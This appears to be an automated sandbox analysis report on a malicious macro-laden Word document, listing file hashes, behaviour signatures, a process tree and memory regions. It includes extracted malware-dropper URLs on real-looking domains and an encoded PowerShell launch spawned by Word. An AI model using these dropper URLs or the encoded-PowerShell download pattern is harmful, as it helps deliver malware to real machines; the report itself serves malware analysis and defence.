Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/05/2024, 23:20

General

  • Target

    7ebdfc51b5db238b10845f5779b9861f_JaffaCakes118.doc

  • Size

    148KB

  • MD5

    7ebdfc51b5db238b10845f5779b9861f

  • SHA1

    e8fe96482813fe09819fabdcdc36f6e837c804ca

  • SHA256

    6964b98e57e916fabb11b9325e9610748e9154a71cd4a51c3f1eb9f26a3026c3

  • SHA512

    4d1d8ece04a893a4f3c89d1765df8f6e418eb1d660261085afd735f9700b5ace18bb631bd8cd04a03fc5580ef642cbb8d9aeb869d106c3e3109bac5609ffc891

  • SSDEEP

    3072:l77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qYIdp8CZZyOdyPntYh:l77HUUUUUUUUUUUUUUUUUUUT52VgYCZR

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper: http://harazoil.com/wp-content/r7v83/
    exe.dropper: https://babalublog.com/image/h5jo1ao23800/
    exe.dropper: http://bigbrushmedia.com/wvvw/aljrz25/
    exe.dropper: http://blipin.com/vna984247/
    exe.dropper: http://bmserve.com/mobile/m1z5378/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ebdfc51b5db238b10845f5779b9861f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
      powErSHell -e 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
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      e53ac1de9dc5076c6ffe73baa238a697

      SHA1

      0e96b3e3498ad7614096f10a5012900f39cf4250

      SHA256

      7e2ed36eda74d2579c1c1501d3c012d442496abb28455dee5ac5ff667a646300

      SHA512

      674318b49d1b178e857b1cb538f90a5b34c29a9dab4679013da83333110e582f40c89ac7368b2dba7b4812ad099125627d9237bf3612a1a24c1cfac659dbec2a

    • memory/2348-20-0x0000000006700000-0x0000000006800000-memory.dmp

      Filesize

      1024KB

    • memory/2348-13-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-7-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-8-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-9-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-10-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-12-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-21-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-0-0x000000002FF41000-0x000000002FF42000-memory.dmp

      Filesize

      4KB

    • memory/2348-16-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-2-0x000000007194D000-0x0000000071958000-memory.dmp

      Filesize

      44KB

    • memory/2348-19-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-15-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-58-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-57-0x000000007194D000-0x0000000071958000-memory.dmp

      Filesize

      44KB

    • memory/2348-37-0x000000007194D000-0x0000000071958000-memory.dmp

      Filesize

      44KB

    • memory/2348-38-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-39-0x00000000064E0000-0x00000000065E0000-memory.dmp

      Filesize

      1024KB

    • memory/2348-40-0x0000000006700000-0x0000000006800000-memory.dmp

      Filesize

      1024KB

    • memory/2348-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2348-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2660-28-0x0000000002860000-0x0000000002868000-memory.dmp

      Filesize

      32KB

    • memory/2660-27-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB